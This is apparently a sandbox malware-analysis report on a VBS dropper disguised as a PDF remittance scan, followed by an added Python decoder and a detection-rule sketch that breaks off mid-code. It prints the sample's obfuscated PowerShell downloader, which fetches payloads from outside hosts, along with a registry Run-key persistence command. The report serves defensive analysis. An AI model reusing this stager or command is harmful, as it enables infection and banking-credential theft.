            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivelsens.p
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivelsensp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivelsep
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivelsp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivep
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengivp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hengp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Henp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hep
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/Hp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigi/p
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigip
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zigp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zip
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.com/zp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.comp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.cop
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.cp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sbtechus.p
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128184809694.0000000004611000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz$
            Source: powershell.exe, 00000002.00000002.127614664606.0000027E9BEAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128180982153.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560027986.00000000088AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83A21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.128184809694.0000000004611000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000004.00000002.128197255466.000000000567C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.128197255466.000000000567C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.128197255466.000000000567C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester4
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz$
            Source: powershell.exe, 00000002.00000002.127616099079.0000027E9C1E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.c
            Source: msiexec.exe, 00000006.00000002.128753973581.000000000886C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560180223.000000000886C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.128761464292.0000000024390000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://ipfs.io/ipfs/bafybeif4qizmuos6tnbqhccf4cms273spugub5lbtgpc5zaaljfefoarzy/QMpkuY58.bin
            Source: powershell.exe, 00000002.00000002.127610468902.0000027E93A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128197255466.000000000567C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000002.00000002.127614664606.0000027E9BEAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128180982153.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560027986.00000000088AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknown | HTTPS traffic detected: 209.94.90.1:443 -> 192.168.11.20:49783 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Windows\SysWOW64\msiexec.exe | Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe

            E-Banking Fraud

            Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1616, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Roaming\abios.dat, type: DROPPED

            System Summary

            Source: amsi32_3592.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6212, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3592, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
            Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
            Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. 
RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF7C4F9AD92
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF7C4F9BB6E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_04517D30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_04518600
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_045179E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08950647
Source: REMIT_SCAN_00008917738378282733(PDF).vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)"
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 7112
Source: unknown | Process created: Commandline size = 7112
Source: amsi32_3592.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6212, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3592, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBS@13/8@2/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Leveringstiden.Req
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:460:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4636:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:460:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\moutgporsnmx-4IKOBJ
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4636:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pc0kctms.qpc.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6212
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3592
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. 
RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. 
RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)"
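The PowerShell command line captured above carries its own string decoder: `Krigskunst` starts at offset 5 and keeps every sixth character until it indexes past the end, and `Strejflyset` is `.($Postlachrymal) (...)`, which becomes `. IEX (...)` once `$Postlachrymal` is decoded. The following is an added example, written for this report and not code from Joe Sandbox or from the sample, that replicates the decoder in Python and runs it over literals copied from the command line. One caveat it makes explicit: the rendered report collapsed runs of spaces inside the literals, so a string whose length is no longer a multiple of six has lost a decoded character ('UdskrnHorrieGlyphTBagdi. atoW' yields "neT." here, evidently the front half of Net.WebClient given the "EBClIeNt" that is appended to it).

```python
"""Static decoder for the stride obfuscation used by this sample's PowerShell
stager (the Krigskunst function in the captured command line).

Added example for this report; not code from Joe Sandbox or from the sample.
The rule is lifted from the command line itself:
    $Occipitally=5; do { $undefinably += $Diplomatariers[$Occipitally];
                         $Occipitally += 6 } until (!$Diplomatariers[$Occipitally])
i.e. keep every sixth character starting at offset 5; the rest is filler.
"""
from __future__ import annotations
import re

STRIDE = 6
START = 5
CALL = re.compile(r"Krigskunst\s+'([^']*)'")   # literal-argument calls only

def krigskunst(obf: str) -> str:
    """Python equivalent of the stager's decoder. PowerShell indexing past the
    end returns $null, so the loop stops at the first missing offset; an
    extended slice behaves the same way."""
    return obf[START::STRIDE]

def decode_literals(ps: str) -> list[tuple[str, str]]:
    """Every Krigskunst call with a literal argument, as (obfuscated, decoded).
    Calls that pass a variable (Krigskunst $Overkrslerne) need a second pass
    after that variable's own literal has been resolved."""
    return [(m, krigskunst(m)) for m in CALL.findall(ps)]

def looks_mangled(obf: str) -> bool:
    """True when the literal's length is not a multiple of the stride: in this
    sample every literal is built from 6-character chunks, so a short one has
    lost whitespace (the HTML report collapses repeated spaces)."""
    return len(obf) % STRIDE != 0

# Constructed excerpt: assignments copied from the command line in the report.
SAMPLE = (
    "$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';"
    "$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';"
    "$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';"
    "$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';"
    "$Textus=Krigskunst 'Am hi>';"
    "$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';"
)

def decoded_values(ps: str = SAMPLE) -> list[str]:
    return [clear for _, clear in decode_literals(ps)]

if __name__ == "__main__":
    for obf, clear in decode_literals(SAMPLE):
        note = "  (length not a multiple of 6: whitespace lost in rendering)" if looks_mangled(obf) else ""
        print(f"{clear!r:<12} <- {obf!r}{note}")
```

Run against the report's literals this recovers `iEX` (so every `Strejflyset (Krigskunst '...')` is an Invoke-Expression), `Tls12`, the `Mozilla/` start of the User-Agent and the `>` used for output redirection; feed it the raw command line from the sandbox's process dump rather than the rendered HTML to avoid the collapsed-space problem.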
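The chain above (wscript.exe to a 7 KB PowerShell command line, PowerShell to an argument-less SysWOW64 msiexec.exe, msiexec.exe to cmd.exe and reg.exe writing a Run value that only holds an environment-variable reference plus a `GetValue()` read of another registry value) is what a detection engineer would turn into rules. The following is an added example, not from Joe Sandbox or the sample, that encodes those four observations as predicates and runs them over process-creation events constructed from the rows above; the two benign events and the padding standing in for the obfuscated PowerShell body are invented for contrast, and the Sysmon-style field layout is an assumption.

```python
"""Rule-based triage of the process chain listed in this report.

Added example, not from Joe Sandbox or the sample. Events are constructed from
the parent/child pairs and command lines above in a Sysmon-like shape.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    parent: str    # image path of the creating process
    image: str     # image path of the created process
    cmdline: str

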